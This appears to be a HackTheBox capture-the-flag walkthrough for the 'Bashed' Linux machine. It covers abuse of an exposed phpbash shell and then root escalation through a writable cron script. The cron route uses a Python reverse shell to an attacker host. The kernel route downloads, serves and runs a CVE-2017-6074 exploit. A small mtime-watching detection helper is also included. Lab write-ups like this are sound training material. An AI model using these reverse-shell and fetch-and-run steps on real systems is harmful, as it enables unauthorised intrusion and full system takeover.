Walkthrough - Bashed on HackTheBox
Bashed is another classic Linux machine on HackTheBox, and can be pwned through some careful observation.
Let's go!
Nmap
Let's start with a port scan:
nmap box.htb -v -sV
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Note: box.htb has been configured to point to the machine in /etc/hosts on Kali.
We see that the machine is running Apache on port 80. Let's take a look:
The webpage makes reference to phpbash, which acts as a web command line interface. The blog post hints that phpbash is also being hosted on the Apache server.
Phpbash
Using dirbuster, we quickly find that phpbash.php is being hosted at box.htb/dev/phpbash.php
Right off the bat, phpbash gives us a shell as www-data, and we can grab the user flag from arrexel's home directory:
cat /home/arrexel/user.txt
fa75e3**************************
Privilege Escalation
Now we need to try and obtain root privileges.
Method 1 - Cron/Sudo Misconfiguration
It's a good idea to check for sudo misconfigurations when attempting privilege escalation, which we can do with the sudo -l command.
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
The last line of the output tells us that www-data may run any command as scriptmanager without a password, using the form sudo -u <username> <command>. In sudoers terms, the rule behind this output is an ALL entry for www-data with the NOPASSWD tag and scriptmanager as the runas user, so no credential is ever needed.
This looks like a potential privilege escalation vector. Let's determine what scriptmanager can access:
sudo -u scriptmanager id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
We can see that scriptmanager is in its own group only, with no extra memberships, so the interesting question is which files and directories belong to that user or group. Searching by group finds them:
find / -group scriptmanager 2>/dev/null
/scripts
/scripts/test.py
/scripts/test.txt
...
The /scripts directory is the interesting one: if you pay close attention, you will see that test.txt is owned by root, yet its timestamp advances every minute. Something running as root rewrites that file on a timer, which points to a root cron job executing the scripts in /scripts every minute. Since /scripts belongs to scriptmanager, www-data cannot edit test.py directly, but the sudo rule above lets us write it as scriptmanager. Start a netcat listener on <port> on the attacking machine first, then replace the contents of test.py with a Python reverse shell like the one below:
import socket,subprocess,os
# Connect back to the listener waiting on the attacking machine
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<attacker-ip>",<port>))
# Point stdin, stdout and stderr of this process at the socket
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# Spawn an interactive shell; when the root cron job runs this file, it is a root shell
p=subprocess.call(["/bin/sh","-i"])
After at most a minute the cron job runs the modified script and the listener receives a root shell:
cat /root/root.txt
1947e3**************************
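The step above relies on running ls -l twice and noticing that test.txt has moved on. The helpers below, an added example that is not part of the original walkthrough, turn that observation into a repeatable check: one lists files owned by a given user that changed in the last few minutes, the other records a file's mtime, waits just over one cron tick, and reports whether it was rewritten. It assumes GNU find and stat as shipped on Ubuntu (the -mmin and -c options), with a BSD stat fallback for the attacking side; directory, user and wait time are parameters, and the data it is exercised on is constructed.

```sh
#!/bin/sh
# Added example, not from the original walkthrough: make the "test.txt is
# root-owned and its timestamp keeps moving" observation repeatable.
# Assumes GNU findutils/coreutils (-mmin, stat -c), as on Ubuntu; a BSD stat
# fallback is included so the same script runs on the attacking machine.

# List regular files under DIR owned by USER and modified in the last MINS
# minutes. A root-owned file that keeps showing up here, inside a directory
# root does not own, means a root process is writing there on a schedule.
recent_writes_by() {
    dir=$1
    user=$2
    mins=$3
    find "$dir" -type f -user "$user" -mmin "-$mins" 2>/dev/null | sort
}

# Modification time of FILE as epoch seconds (GNU stat first, then BSD stat).
mtime_of() {
    stat -c %Y "$1" 2>/dev/null || stat -f %m "$1"
}

# Record FILE's mtime, wait WAIT seconds (default 65, just over one cron
# minute), and report whether the file was rewritten in the meantime.
# Returns 0 if the mtime advanced, 1 otherwise.
watch_mtime() {
    file=$1
    wait=${2:-65}
    before=$(mtime_of "$file")
    sleep "$wait"
    after=$(mtime_of "$file")
    if [ "$after" -gt "$before" ]; then
        echo "$file rewritten while waiting ($before -> $after): a timed job is running"
        return 0
    fi
    echo "$file unchanged after ${wait}s"
    return 1
}

# On the box, paste the functions into the shell and run:
#   recent_writes_by /scripts root 2     # lists test.txt if root wrote it recently
#   watch_mtime /scripts/test.txt        # reports "rewritten" after ~65 seconds
```

The second check is the one that matters: a single recent mtime can be a one-off, but an mtime that advances again while you wait is a timer, and a root-owned output file in a directory owned by another user tells you which account that timer runs as.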
Alternatively, you can opt to escalate your privileges using a kernel exploit, which you can read more about below:
Method 2 - Kernel Exploit
Let's determine the version of Linux being run on this machine:
uname -a
Linux bashed 4.4.0-62-generic
A quick Google search reveals that this Ubuntu kernel predates the fix for the DCCP double-free, CVE-2017-6074, and that Exploit-DB entry 41458 is a working proof of concept for it.
Download the exploit and compile it on your attacking machine:
wget https://www.exploit-db.com/download/41458
mv 41458 poc.c
gcc poc.c -o pwn
We can set up a simple HTTP server on the attacking machine to host the compiled exploit:
python -m SimpleHTTPServer 1234
Serving HTTP on 0.0.0.0 port 1234 ...
Now, from a shell on the victim, download the exploit into a directory that www-data can write to, such as /tmp:
wget http://<attacker-ip>:1234/pwn
Make the pwn file executable and run it:
chmod +x pwn
./pwn
The exploit drops you into a root shell, so run it from a proper interactive shell (a reverse shell as www-data will do) rather than from the phpbash page. Keep in mind that a kernel exploit that fails can panic the machine; on a shared HTB instance that takes the box down for everyone, which is why the cron route is the safer first choice. And voila!
cat /root/root.txt
1947e3**************************